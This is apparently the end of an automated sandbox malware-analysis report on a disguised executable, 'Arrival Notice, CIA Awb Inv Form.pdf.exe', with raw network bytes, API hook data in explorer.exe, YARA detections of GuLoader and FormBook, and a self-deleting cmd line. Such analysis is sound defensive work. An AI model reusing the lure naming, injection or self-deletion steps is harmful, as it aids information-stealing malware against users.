                                                                                                              2021-11-24 14:07:32 UTC189INData Raw: e5 a3 2b 47 d9 2c c6 3c b5 70 30 5c e1 97 dc a9 79 f4 3c 7c fb 83 64 1a 2a 31 97 c1 21 a0 87 d8 4a df 43 08 25 52 c3 4a b9 6d 15 69 cd 89 e3 0e 54 6b 56 dc 6b 05 6d 85 db be 15 37 a3 cb 13 69 ba 51 fa 3b ec 16 40 51 1f de 12 78 e3 9d d0 a0 c7 d4 88 e6 00 fe f9 9b f8 41 91 25 c8 45 35 47 74 5b bd 78 30 59 d3 11 bb db 26 3e 82 b2 1b 0d 5a 2d 59 58 b7 e9 2d 53 20 78 4e 25 e2 4c 1b 5c b5 3e e6 86 59 68 80 63 bf 5a 41 85 e9 24 dc 39 31 fb 48 b1 39 f6 82 a6 b0 37 e1 8d a7 79 0f 25 e8 21 0b 93 f1 36 f1 78 d3 2d bf ba c5 52 1d ed 41 1a ef be 41 e1 da f9 23 1c e5 b4 f8 7a b2 eb e9 5c 6c 3a 47 34 d1 ed 86 b7 7e 50 9a 13 af 78 cf c8 ba 71 b1 74 70 f2 2b 41 49 16 71 2e 1b d4 b9 60 44 0f b3 fc a4 e6 fd d5 ad 41 e3 2c e9 c0 42 59 90 07 94 be bb 69 7a e6 a3 fe 8b e8 5b
                                                                                                              Data Ascii: +G,<p0\y<|d*1!JC%RJmiTkVkm7iQ;@QxA%E5Gt[x0Y&>Z-YX-S xN%L\>YhcZA$91H97y%!6x-RAA#z\l:G4~Pxqtp+AIq.`DA,BYiz[
                                                                                                              2021-11-24 14:07:32 UTC191INData Raw: 0c f2 27 2c 07 ca b0 01 7b d4 aa e3 66 a8 2b 29 5b 1c 5b d0 22 75 0d 68 0e 61 5a 22 61 2a a2 6e 9e 02 9b d8 37 bb be ed ed 0b 14 6b 3b 5b a5 eb a7 90 e3 6c 6a 3f f7 2b 23 08 60 e5 2f cd 31 53 e2 9b 1c 03 92 87 7c ec 7d 38 49 05 8a a5 ae 92 d1 05 f4 f3 25 7f 97 d8 4b a2 84 92 67 6d e2 29
                                                                                                              Data Ascii: ',{f+)[["uhaZ"a*n7k;[lj?+#`/1S|}8I%Kgm)


                                                                                                              Code Manipulations

                                                                                                              User Modules

                                                                                                              Hook Summary

                                                                                                              Function NameHook TypeActive in Processes
                                                                                                              PeekMessageAINLINEexplorer.exe
                                                                                                              PeekMessageWINLINEexplorer.exe
                                                                                                              GetMessageWINLINEexplorer.exe
                                                                                                              GetMessageAINLINEexplorer.exe

                                                                                                              Processes

                                                                                                              Process: explorer.exe, Module: user32.dll
                                                                                                              Function NameHook TypeNew Data
                                                                                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xED
                                                                                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xED
                                                                                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xED
                                                                                                              GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xED

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 4636 Parent PID: 2496

                                                                                                              General

                                                                                                              Start time:15:06:15
                                                                                                              Start date:24/11/2021
                                                                                                              Path:C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:214328 bytes
                                                                                                              MD5 hash:FF71941571D8930C1125B3931D400D86
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Visual Basic
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              Analysis Process: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 7132 Parent PID: 4636

                                                                                                              General

                                                                                                              Start time:15:06:58
                                                                                                              Start date:24/11/2021
                                                                                                              Path:C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:214328 bytes
                                                                                                              MD5 hash:FF71941571D8930C1125B3931D400D86
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              Reputation:low

                                                                                                              Analysis Process: explorer.exe PID: 4672 Parent PID: 7132

                                                                                                              General

                                                                                                              Start time:15:07:32
                                                                                                              Start date:24/11/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                              Imagebase:0x7ff630d80000
                                                                                                              File size:4849904 bytes
                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              Reputation:moderate

                                                                                                              Analysis Process: NETSTAT.EXE PID: 5904 Parent PID: 4672

                                                                                                              General

                                                                                                              Start time:15:07:47
                                                                                                              Start date:24/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                              Imagebase:0x2a0000
                                                                                                              File size:32768 bytes
                                                                                                              MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                              • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              Reputation:low

                                                                                                              Analysis Process: cmd.exe PID: 3516 Parent PID: 5904

                                                                                                              General

                                                                                                              Start time:15:07:51
                                                                                                              Start date:24/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
                                                                                                              Imagebase:0x990000
                                                                                                              File size:236544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Analysis Process: conhost.exe PID: 1324 Parent PID: 3516

                                                                                                              General

                                                                                                              Start time:15:07:51
                                                                                                              Start date:24/11/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff694d50000
                                                                                                              File size:875008 bytes
                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >